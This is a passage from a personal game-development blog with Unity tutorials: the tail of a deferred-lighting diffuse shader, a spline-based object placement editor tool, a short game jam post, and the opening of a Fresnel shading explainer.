<span class="n">Tags</span> <span class="p">{</span> <span class="s">"RenderType"</span><span class="o">=</span><span class="s">"Opaque"</span> <span class="p">}</span>
<span class="n">LOD</span> <span class="mi">200</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf MyDiffuse
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span> <span class="p">{</span>
<span class="n">float2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span> <span class="p">{</span>
<span class="n">half4</span> <span class="n">c</span> <span class="o">=</span> <span class="n">tex2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">float4</span> <span class="n">LightingMyDiffuse_PrePass</span><span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">i</span><span class="p">,</span> <span class="n">float4</span> <span class="n">light</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">float4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">light</span><span class="p">.</span><span class="n">rgb</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<h2>Conclusion</h2>
<p>So there you have it, a custom diffuse shader for deferred lighting! Surface shaders really aren’t as much fun as regular pixel shaders (imo), but they definitely fit the bill in this case.</p>
<p>If you notice any errors, have a good system worked out for writing non surface shaders with Unity’s deferred path, or just want to say hi, send me a message <a href="http://twitter.com/khalladay">on twitter</a>. Happy coding!</p>
A Spline Based Object Placement Tool2014-03-30T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2014/03/30/Placing-Objects-On-A-Spline<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number
</div>
<p>I’m convinced that one of the secrets to levelling up your Unity skills is to become very comfortable writing custom editor tools. Every project I’ve worked on in the past year has been made significantly better by building tools to automate repetitive or time consuming tasks.</p>
<p>For example, imagine you are working on a project which requires placing gems at even distances (like coins in Temple Run, or rings in Sonic). Placing all of these by hand isn’t a good use of anyone’s time, and making changes to these layouts sucks because moving a gem in the middle of a row means that everything after it needs to be adjusted as well.</p>
<p>A tool that automatically places objects at even spaces along a spline would not only allow you to get the objects placed faster, but make it way easier to make changes later. This post is going to show you the basics of how to put a tool like this together.</p>
<p>(There’s a unitypackage download at the end of this post if you just want the code.)</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_placed.png" /><br />
</div>
<p><br /></p>
<h2>The General Idea</h2>
<p>The tool we’re building is fairly simple, but there are a few different parts we need to set up. We’ll cover these in order:</p>
<ul>
<li>A way to make a spline</li>
<li>A way to manipulate (and see) our spline</li>
<li>A way to place objects on the spline, and manage these objects</li>
</ul>
<h2>Making a Spline</h2>
<p>I could probably write a few blog posts just covering different spline creation algorithms, but thankfully the Unity wiki has us covered here. Head over there and grab the <a href="http://wiki.unity3d.com/index.php?title=Interpolate#Interpolate.cs">Interpolate.cs script</a>. This will handle all the complicated parts of creating our spline for us. All that’s left for us is to define the inputs.</p>
<p>If you look at Interpolate.cs, you’ll find the method that we’ll be using to generate our splines:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">IEnumerable</span><span class="o"><</span><span class="n">Vector3</span><span class="o">></span> <span class="n">NewCatmullRom</span><span class="p">(</span><span class="n">Transform</span><span class="p">[]</span> <span class="n">nodes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">slices</span><span class="p">,</span> <span class="kt">bool</span> <span class="n">loop</span><span class="p">)</span> </code></pre></figure>
<p>So the inputs this method needs are an array of nodes (the Transforms whose positions are the initial control points that define the shape of our spline), the number of slices (points placed between these initial nodes), and whether or not we want our spline to loop. On top of those, our tool also needs the GameObject we want to duplicate along the path.</p>
<p>However, none of the logic regarding what these inputs are should be put into Interpolate.cs, which means it’s time for us to start writing our custom tool class.</p>
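<p>As an aside, if you’re curious what a Catmull-Rom spline is doing under the hood, here’s a minimal sketch of evaluating a single segment. This is the standard uniform Catmull-Rom formula written out by hand, not code taken from Interpolate.cs, and the class and method names are hypothetical.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using UnityEngine;

// Hypothetical helper for illustration only; Interpolate.cs has its own implementation
public static class CatmullRomSketch
{
    // Evaluates the curve segment that runs from p1 to p2.
    // p0 and p3 are the neighbouring control points that shape the curve,
    // and t goes from 0 (at p1) to 1 (at p2).
    public static Vector3 Evaluate(Vector3 p0, Vector3 p1, Vector3 p2, Vector3 p3, float t)
    {
        float t2 = t * t;
        float t3 = t2 * t;

        return 0.5f * ((2f * p1)
            + (p2 - p0) * t
            + (2f * p0 - 5f * p1 + 4f * p2 - p3) * t2
            + (3f * p1 - p0 - 3f * p2 + p3) * t3);
    }
}</code></pre></figure>
<p>Plugging in t = 0 gives back p1 and t = 1 gives back p2, which is why the curve passes through every control point. The “slices” input is effectively how many values of t get sampled between each pair of nodes.</p>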
<h2>Seeing and Manipulating the Spline</h2>
<p>So as mentioned, the first thing our tool will need to do is provide inputs to the Interpolate class. So let’s set that up:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">public</span> <span class="k">class</span> <span class="nc">SplinePlacer</span> <span class="p">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="k">public</span> <span class="n">Transform</span><span class="p">[]</span> <span class="n">initialNodes</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">int</span> <span class="n">curveResolution</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">bool</span> <span class="n">loop</span><span class="p">;</span>
<span class="k">public</span> <span class="n">GameObject</span> <span class="n">objectToPlace</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>You can go ahead and set these up in the inspector if you want, although you won’t see anything yet, so we should also set up the gizmos to visualize the spline. Gizmos (for those who are unfamiliar with them) are objects which are drawn in the scene view but do not appear in your actual game. We’re going to be using the Gizmos API to draw our spline.</p>
<p>To draw a custom gizmo for a component, you need to implement the OnDrawGizmos method. Let’s start by drawing a sphere at every initial node point, so that we don’t need the Transform objects we’re supplying to have a mesh renderer attached to them. The code below allocates an array of Vector3s that isn’t really being used in this example, but we will be using this array later, so I’ve included it now to avoid needing to change code as we go.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">OnDrawGizmos</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Vector3</span><span class="p">[]</span> <span class="n">initialPoints</span> <span class="p">=</span> <span class="k">new</span> <span class="n">Vector3</span><span class="p">[</span><span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span> <span class="p"><</span> <span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">i</span><span class="p">++)</span>
<span class="p">{</span>
<span class="n">initialPoints</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="p">=</span> <span class="n">initialNodes</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">position</span><span class="p">;</span>
<span class="n">Gizmos</span><span class="p">.</span><span class="nf">DrawWireSphere</span><span class="p">(</span><span class="n">initialPoints</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="m">0.1f</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>If you switch back to the editor, and add a few empty GameObjects to the list of initialNodes, you should now have shiny wireframe spheres in the scene view to help you see what’s going on.</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_spheres.png" /><br />
</div>
<p><br /></p>
<p>Great! Now let’s get on with the business of actually seeing our spline.</p>
<p>To do this, we need to create a spline on every call of the OnDrawGizmos method, and draw a line segment between each node on the newly created spline (we create a new spline on every call so that we can see the updates to the spline as we move the nodes in the scene view).</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">OnDrawGizmos</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">initialNodes</span> <span class="p">==</span> <span class="k">null</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span> <span class="p"><</span> <span class="m">2</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="n">Vector3</span><span class="p">[]</span> <span class="n">initialPoints</span> <span class="p">=</span> <span class="k">new</span> <span class="n">Vector3</span><span class="p">[</span><span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span> <span class="p"><</span> <span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">i</span><span class="p">++)</span>
<span class="p">{</span>
<span class="n">initialPoints</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="p">=</span> <span class="n">initialNodes</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">position</span><span class="p">;</span>
<span class="n">Gizmos</span><span class="p">.</span><span class="nf">DrawWireSphere</span><span class="p">(</span><span class="n">initialPoints</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="m">0.15f</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">IEnumerable</span><span class="p"><</span><span class="n">Vector3</span><span class="p">></span> <span class="n">spline</span> <span class="p">=</span> <span class="n">Interpolate</span><span class="p">.</span><span class="nf">NewCatmullRom</span><span class="p">(</span><span class="n">initialNodes</span><span class="p">,</span>
<span class="n">curveResolution</span><span class="p">,</span>
<span class="n">loop</span><span class="p">);</span>
<span class="n">IEnumerator</span> <span class="n">iterator</span> <span class="p">=</span> <span class="n">spline</span><span class="p">.</span><span class="nf">GetEnumerator</span><span class="p">();</span>
<span class="n">iterator</span><span class="p">.</span><span class="nf">MoveNext</span><span class="p">();</span>
<span class="kt">var</span> <span class="n">lastPoint</span> <span class="p">=</span> <span class="n">initialPoints</span><span class="p">[</span><span class="m">0</span><span class="p">];</span>
<span class="k">while</span> <span class="p">(</span><span class="n">iterator</span><span class="p">.</span><span class="nf">MoveNext</span><span class="p">())</span>
<span class="p">{</span>
<span class="n">Gizmos</span><span class="p">.</span><span class="nf">DrawLine</span><span class="p">(</span><span class="n">lastPoint</span><span class="p">,</span> <span class="p">(</span><span class="n">Vector3</span><span class="p">)</span><span class="n">iterator</span><span class="p">.</span><span class="n">Current</span><span class="p">);</span>
<span class="n">lastPoint</span> <span class="p">=</span> <span class="p">(</span><span class="n">Vector3</span><span class="p">)</span><span class="n">iterator</span><span class="p">.</span><span class="n">Current</span><span class="p">;</span>
<span class="c1">//prevent an infinite loop if we want our spline to loop</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lastPoint</span> <span class="p">==</span> <span class="n">initialPoints</span><span class="p">[</span><span class="m">0</span><span class="p">])</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>If you compile this, and throw a few control points into the inspector panel, you should be able to drag them around and see something like this:</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_basic.png" /><br />
</div>
<p><br /></p>
<p>Although this looks cool, it really isn’t useful yet, which brings us to part 3:</p>
<h2>Placing Objects on the Spline</h2>
<p>The most common use case I’ve found for this type of tool is placing objects along the spline while setting up the scene (i.e. before runtime), so that’s what we’ll cover here.</p>
<p>I’ve found the most intuitive way to handle this is to write a custom inspector for the SplinePlacer class that draws a button that triggers the placement action. So let’s do that now:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">using</span> <span class="n">UnityEngine</span><span class="p">;</span>
<span class="k">using</span> <span class="n">UnityEditor</span><span class="p">;</span>
<span class="k">using</span> <span class="n">System</span><span class="p">.</span><span class="n">Collections</span><span class="p">;</span>
<span class="p">[</span><span class="n">CustomEditor</span><span class="p">(</span><span class="n">typeof</span><span class="p">(</span><span class="n">SplinePlacer</span><span class="p">))]</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">SplinePlacerEditor</span> <span class="o">:</span> <span class="n">Editor</span>
<span class="p">{</span>
<span class="k">public</span> <span class="k">override</span> <span class="kt">void</span> <span class="n">OnInspectorGUI</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">DrawDefaultInspector</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">GUILayout</span><span class="p">.</span><span class="n">Button</span><span class="p">(</span><span class="s">"Place Objects"</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">SplinePlacer</span> <span class="n">placer</span> <span class="o">=</span> <span class="p">(</span><span class="n">SplinePlacer</span><span class="p">)</span><span class="n">target</span><span class="p">;</span>
<span class="n">placer</span><span class="p">.</span><span class="n">PlaceObjects</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>This code won’t compile yet, because we haven’t defined the PlaceObjects method in SplinePlacer, so go ahead and add an empty method with that name now. Once you’ve done that, throw this new inspector class into your Editor folder and let it compile. If you click back to your spline placer object it should look something like this:</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_placer.png" /><br />
</div>
<p><br /></p>
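<p>For reference, here’s roughly what SplinePlacer might look like at this point with the empty method added. Two things in this sketch are assumptions: the PlaceObjects code further down reads a distanceBetweenObjects value and uses List&lt;Vector3&gt;, neither of which appears in the class as shown earlier, so this sketch adds a public float field with that name (the default of 1 is arbitrary) and the System.Collections.Generic using.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">using UnityEngine;
using System.Collections;
using System.Collections.Generic; // needed later for List&lt;Vector3&gt;

public class SplinePlacer : MonoBehaviour
{
    public Transform[] initialNodes;
    public int curveResolution;
    public bool loop;
    public GameObject objectToPlace;

    // Assumed field: spacing between placed objects, in world units.
    // The name comes from the PlaceObjects code below; the default is a guess.
    public float distanceBetweenObjects = 1.0f;

    // Empty for now, so that SplinePlacerEditor has something to call
    public void PlaceObjects()
    {
    }

    // The OnDrawGizmos method from the previous section goes here, unchanged
}</code></pre></figure>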
<p>Now all that’s left is to actually have PlaceObjects do something and we’re good to go. This gets a bit hairy, especially because I’m duplicating a lot of code so that I can present a self contained method for this tutorial, but the algorithm is as follows:</p>
<ul>
<li>Place an object at the first control point</li>
<li>Traverse a distance along the spline (our distanceBetweenObjects variable)</li>
<li>When we have moved far enough along, place another object</li>
<li>Continue this process until we reach the end of the spline</li>
</ul>
<p>And an implementation of this might look like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="kt">void</span> <span class="nf">PlaceObjects</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//To make things easier to understand</span>
<span class="c1">//we're going to parse the spline into a </span>
<span class="c1">//list of Vector3s instead of using the iterator</span>
<span class="n">IEnumerable</span><span class="o"><</span><span class="n">Vector3</span><span class="o">></span> <span class="n">spline</span> <span class="o">=</span> <span class="n">Interpolate</span><span class="p">.</span><span class="n">NewCatmullRom</span><span class="p">(</span><span class="n">initialNodes</span><span class="p">,</span>
<span class="n">curveResolution</span><span class="p">,</span>
<span class="n">loop</span><span class="p">);</span>
<span class="n">IEnumerator</span> <span class="n">iterator</span> <span class="o">=</span> <span class="n">spline</span><span class="p">.</span><span class="n">GetEnumerator</span><span class="p">();</span>
<span class="n">List</span><span class="o"><</span><span class="n">Vector3</span><span class="o">></span> <span class="n">splinePoints</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Vector3</span><span class="o">></span><span class="p">();</span>
<span class="k">while</span> <span class="p">(</span><span class="n">iterator</span><span class="p">.</span><span class="n">MoveNext</span><span class="p">())</span>
<span class="p">{</span>
<span class="n">splinePoints</span><span class="p">.</span><span class="n">Add</span><span class="p">((</span><span class="n">Vector3</span><span class="p">)</span><span class="n">iterator</span><span class="p">.</span><span class="n">Current</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//distanceToMove represents how much farther</span>
<span class="c1">//we need to progress down the spline before</span>
<span class="c1">//we place the next object</span>
<span class="kt">int</span> <span class="n">nextSplinePointIndex</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">distanceToMove</span> <span class="o">=</span> <span class="n">distanceBetweenObjects</span><span class="p">;</span>
<span class="c1">//our current position on the spline</span>
<span class="n">Vector3</span> <span class="n">positionIterator</span> <span class="o">=</span> <span class="n">splinePoints</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="c1">//our algo skips the first control point, so </span>
<span class="c1">//we need to manually place the first object</span>
<span class="n">GameObject</span><span class="p">.</span><span class="n">Instantiate</span><span class="p">(</span><span class="n">objectToPlace</span><span class="p">,</span> <span class="n">positionIterator</span><span class="p">,</span> <span class="n">Quaternion</span><span class="p">.</span><span class="n">identity</span><span class="p">);</span>
<span class="k">while</span><span class="p">(</span><span class="n">nextSplinePointIndex</span> <span class="o"><</span> <span class="n">splinePoints</span><span class="p">.</span><span class="n">Count</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Vector3</span> <span class="n">direction</span> <span class="o">=</span> <span class="p">(</span><span class="n">splinePoints</span><span class="p">[</span><span class="n">nextSplinePointIndex</span><span class="p">]</span> <span class="o">-</span> <span class="n">positionIterator</span><span class="p">);</span>
<span class="n">direction</span> <span class="o">=</span> <span class="n">direction</span><span class="p">.</span><span class="n">normalized</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">distanceToNextPoint</span> <span class="o">=</span> <span class="n">Vector3</span><span class="p">.</span><span class="n">Distance</span><span class="p">(</span><span class="n">positionIterator</span><span class="p">,</span>
<span class="n">splinePoints</span><span class="p">[</span><span class="n">nextSplinePointIndex</span><span class="p">]);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">distanceToNextPoint</span> <span class="o">>=</span> <span class="n">distanceToMove</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">positionIterator</span> <span class="o">+=</span> <span class="n">direction</span><span class="o">*</span><span class="n">distanceToMove</span><span class="p">;</span>
<span class="n">GameObject</span><span class="p">.</span><span class="n">Instantiate</span><span class="p">(</span><span class="n">objectToPlace</span><span class="p">,</span>
<span class="n">positionIterator</span><span class="p">,</span>
<span class="n">Quaternion</span><span class="p">.</span><span class="n">identity</span><span class="p">);</span>
<span class="n">distanceToMove</span> <span class="o">=</span> <span class="n">distanceBetweenObjects</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">distanceToMove</span> <span class="o">-=</span> <span class="n">distanceToNextPoint</span><span class="p">;</span>
<span class="n">positionIterator</span> <span class="o">=</span> <span class="n">splinePoints</span><span class="p">[</span><span class="n">nextSplinePointIndex</span><span class="o">++</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Once this code compiles, pressing the “Place Objects” button should populate your spline with the object you provided to be duplicated.</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_placed.png" /><br />
YAY! :D
</div>
<p><br /></p>
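<p>If you want to sanity check the spacing logic outside of Unity, here is a minimal sketch of the same walk. It is not the tool’s actual code: it assumes the spline has already been flattened into a list of points, swaps Unity’s Vector3 for System.Numerics.Vector3, and returns positions instead of instantiating objects. The names EvenSpacing and Place are made up for this example.</p>

```csharp
using System;
using System.Collections.Generic;
using System.Numerics;

public static class EvenSpacing
{
    // Walks the polyline and returns one position every `spacing` units of path length.
    // Hypothetical helper: it mirrors the loop above but has no Unity dependency.
    public static List<Vector3> Place(IList<Vector3> points, float spacing)
    {
        if (points == null) throw new ArgumentNullException(nameof(points));
        if (spacing <= 0f) throw new ArgumentOutOfRangeException(nameof(spacing));

        var placed = new List<Vector3>();
        if (points.Count == 0) return placed;

        Vector3 position = points[0];
        placed.Add(position);            // the loop skips the first point, so place it manually
        float distanceToMove = spacing;  // path length left before the next placement
        int next = 1;

        while (next < points.Count)
        {
            float distanceToNext = Vector3.Distance(position, points[next]);
            if (distanceToNext >= distanceToMove)
            {
                // Enough room left on this segment: step along it and place.
                Vector3 direction = Vector3.Normalize(points[next] - position);
                position += direction * distanceToMove;
                placed.Add(position);
                distanceToMove = spacing;
            }
            else
            {
                // Segment is too short: use it up and carry the remainder over.
                distanceToMove -= distanceToNext;
                position = points[next++];
            }
        }
        return placed;
    }

    public static void Main()
    {
        // A straight 10 unit line with 2.5 unit spacing.
        var line = new List<Vector3> { new Vector3(0, 0, 0), new Vector3(10, 0, 0) };
        foreach (Vector3 p in Place(line, 2.5f))
            Console.WriteLine(p);
    }
}
```

<p>For the straight line in Main, this should give five positions, at x = 0, 2.5, 5, 7.5 and 10. Because the leftover distance carries across short segments, the spacing is measured along the path rather than between control points.</p>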
<h2>Where to go next</h2>
<p>Depending on your needs, there are a ton of different ways to improve on this tool. One addition I’ve found useful is to bind a keyboard shortcut to the act of creating another initial node, adding it to the end of the list of nodes, and selecting it in the hierarchy. This simplifies the process of creating paths greatly.</p>
<p>Another option I’ve found handy in some cases is to automatically select all the spawned objects after placing them, allowing a really quick group edit of their components.</p>
<p>You may also want to write additional inspector buttons for doing things like deleting all spawned children, or serializing their positions, or any of a million other things that might make your specific use case better. There isn’t a “right” way to go about this, as long as your life is better when you’re done the tool.</p>
<p>If you’re running into any issues getting things to work, feel free to grab <a href="https://dl.dropboxusercontent.com/u/6128167/spline_placer.unitypackage">this unitypackage</a>, which contains all of the code presented above. If you’re still running into issues, or you have tools of your own that you want to share, send me a message <a href="http://twitter.com/khalladay">on twitter</a>!</p>
On Bacon Jam and Grilling Virtual Meat2014-03-24T00:00:00+00:00http://kylehalladay.com/blog/2014/03/24/Bacon-Jam-And-Vertex-Colours<div style="background-color:#EEAAAA;">NOTE: This article is OLD! Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p>Weekend game jams aren’t usually my thing. Generally speaking, I like having the weekend to recharge, and spending all of one getting little sleep and feverishly working to finish a (usually) throwaway project is rarely tempting. However, last weekend Reddit hosted the Bacon Jam, and I decided to partake since it had been a while since I had actually finished a game and I felt like getting some momentum back.</p>
<p>The theme of the jam was “Hungry,” and I decided to make a game about grilling meat, because winter has been way too long and cold here in Ontario, and barbeque weather can’t get here fast enough. Although the jam technically ended on Sunday night, I knew that I had other things I needed to get done, and as such would be finishing on Saturday. I also knew I liked sleep, and had no intention of pulling a crazy caffeine fuelled coding binge (like I’ve done at most game jams). The end result was a very small game, that I finished leisurely well before the end of Saturday, and I ended up having a ton of fun doing things this way.</p>
<div align="center">
<img src="/images/post_images/2014-03-24/baconjamgameplay.png" /><br />
<font size="2">My entry for Bacon Jam 7</font>
</div>
<p><br /></p>
<p>Everyone says set your scope small when you’re at a jam, but I think the real secret to enjoying a game jam (and not just finishing it) is to set your project’s scope small enough to be completed within the first half of the jam. If you’re still feeling in the groove, you now have a ton of time to polish your project, and if you aren’t, you can pack up, or socialize, or do whatever the hell you want, and you still walk out of the jam with a finished product.</p>
<p>Aside from discovering a new, much more enjoyable, way to jam, what I found interesting about this weekend was that my project would have been pretty much impossible for me to complete a year ago, given that the core mechanic relies on a shader to pan between three textures (raw, cooked, burnt) on each fragment of meat, and a year ago I was still about 2 months out from really getting anywhere with shader dev. What a difference a year makes!</p>
<p>So, if you’ve been missing the feeling of cooking meat over an open flame lately, check out my game: <a href="http://www.kylehalladay.com/demos/ZenBurnt/ZenBurnt.html">Zen Burnt</a> (a play on the name Zen Bound), just keep your hopes down :P it’s a very very tiny jam game.</p>
<p>Also, I’ll get back to posting every other week or so now. Things got a bit derailed this month because I started a new job (hurray shader dev!), but I already have a much more typical tutorial post in the works for later this week. If ray/triangle intersection sounds interesting to you, check back this weekend!</p>
<p>Finally, as always, send me a message <a href="http://twitter.com/khalladay">on twitter</a> if you feel like it!</p>
The Basics of Fresnel Shading2014-02-18T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2014/02/18/Fresnel-Shaders-From-The-Ground-Up<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore. Beware!
</div>
<p><br /></p>
<p>I recently stumbled on the awesome article: <a href="http://filmicgames.com/archives/557">Everything Has Fresnel</a> (if you haven’t read it, go read it now). The main premise of the article is that real world materials are not actually as neat and tidy as programmers would like to believe, and more specifically, that virtually everything in real life has some degree of fresnel reflectivity.</p>
<p>Fresnel isn’t an effect that I’ve seen often in Unity projects and in fact wasn’t an effect that I was familiar with building, so I decided to kill two birds with one project and put together my latest shader pack: <a href="/all/graphics/2014/02/23/Fresnel-Shaders.html">Fresnel Shaders</a>. It’s all free to use, MIT license, all that jazz, so enjoy :D</p>
<p>But, as usual, I’d also like to make things a bit easier for the next googler looking for an intro to Fresnel reflection. So if writing Fresnel shaders (or adding Fresnel to existing ones) sounds as much fun to you as it was for me, read on!</p>
<div align="center">
<img src="/images/post_images/2014-02-23/FresnelRim.png" /><br />
<font size="2">An unlit Fresnel shader</font>
</div>
<p><br /></p>
<h2>What is the Fresnel Effect</h2>
<p>In essence, the fresnel effect describes the relationship between the angle at which you look at a surface and the amount of reflectivity you see. This is very easy to demonstrate if you have a window nearby. If you look at the window straight on you can see through the window as intended, however, if you move so that you try to look through the window at a glancing angle (ie: your view direction is approaching parallel to the window’s surface) the window becomes much closer to a mirror.</p>
<p>But this effect isn’t limited to windows, or even particularly shiny objects. As John Hable points out in <a href="http://filmicgames.com/archives/557">Everything Has Fresnel</a>, pretty much everything (including towels and bricks!) exhibits the fresnel effect to some degree. I’ve made a game out of trying to spot instances of it as I walk to work (without looking like I’ve lost my mind).</p>
<p>So what does this look like when added to an object in Unity? Here’s a few more examples from my shader pack:</p>
<div align="center">
<img src="/images/post_images/2014-02-23/AllFresnel.png" /><br />
<font size="2">The Shaders in the Fresnel Shader Pack</font>
</div>
<p><br /></p>
<h2>How is it implemented?</h2>
<p>As it turns out, Fresnel equations are complicated, way more so than can be adequately covered by a blog post, and way more than is feasible to execute in real time for most applications. In practice, it’s far more realistic to use an approximation of these equations. In searching, I’ve found two such approximations that have so far seemed appropriate to use in real time shaders.</p>
<p>The first is the Schlick Approximation. This is easy enough to google for, but I’ll put it here just for reference as well:</p>
<div align="center">
R(θ) = R<sub>0</sub> + (1 - R<sub>0</sub>)(1 - cosθ)<sup>5</sup>
</div>
<p><br />
In the above equation, θ is the angle between the direction the incoming light arrives from and the surface normal, and R<sub>0</sub> is the reflection coefficient for light arriving parallel to the normal (θ = 0). R<sub>0</sub> depends on the refractive indices of the two media on either side of the interface (most commonly, air and whatever type of material the surface is). If you’re really interested, definitely check out more detailed sources online. In practice, I’ve found that while this method gives decent looking results, the next option gives us much greater control over the appearance of our materials at the cost of physical correctness. Given that real time graphics are anything but physically correct, I’m ok with this tradeoff.</p>
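<p>To get a feel for the numbers, here is a small CPU-side sketch of the Schlick equation in plain C#. It is only an illustration, not code from the shader pack. The R<sub>0</sub> helper uses the standard relation R<sub>0</sub> = ((n<sub>1</sub> - n<sub>2</sub>) / (n<sub>1</sub> + n<sub>2</sub>))<sup>2</sup>, which isn’t covered in this post, and the refractive indices in Main (1.0 for air, 1.5 for glass) are assumed values.</p>

```csharp
using System;

public static class SchlickFresnel
{
    // Reflectance at normal incidence for light crossing between media
    // with refractive indices n1 and n2.
    public static double ReflectanceAtNormal(double n1, double n2)
    {
        double r = (n1 - n2) / (n1 + n2);
        return r * r;
    }

    // Schlick's approximation: R(theta) = R0 + (1 - R0) * (1 - cos(theta))^5
    public static double Schlick(double r0, double cosTheta)
    {
        // Clamp so a slightly out-of-range cosine cannot push the result past 1.
        double c = Math.Min(1.0, Math.Max(0.0, cosTheta));
        return r0 + (1.0 - r0) * Math.Pow(1.0 - c, 5.0);
    }

    public static void Main()
    {
        double r0 = ReflectanceAtNormal(1.0, 1.5); // assumed indices: air into glass
        for (int degrees = 0; degrees <= 90; degrees += 15)
        {
            double cosTheta = Math.Cos(degrees * Math.PI / 180.0);
            Console.WriteLine(degrees + " degrees: " + Schlick(r0, cosTheta));
        }
    }
}
```

<p>With those indices R<sub>0</sub> works out to roughly 0.04, so the surface reflects about 4% head on and climbs towards 100% at a grazing angle, which matches the window example from earlier.</p>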
<p>The second approximation comes from chapter 7 of the <a href="http://http.developer.nvidia.com/CgTutorial/cg_tutorial_chapter07.html">Cg Tutorial</a> from NVIDIA, which refers to it as the “Empirical Approximation.”<br />
<br /></p>
<div align="center">
R = max(0, min(1, bias + scale * (1.0 + I • N)<sup>power</sup>))
</div>
<p><br /></p>
<ul>
<li>R is a Fresnel term describing how strong the Fresnel effect is at a specific point</li>
<li>I is the normalized vector from the eye to a point on the surface</li>
<li>N is the normalized world space normal of the current point</li>
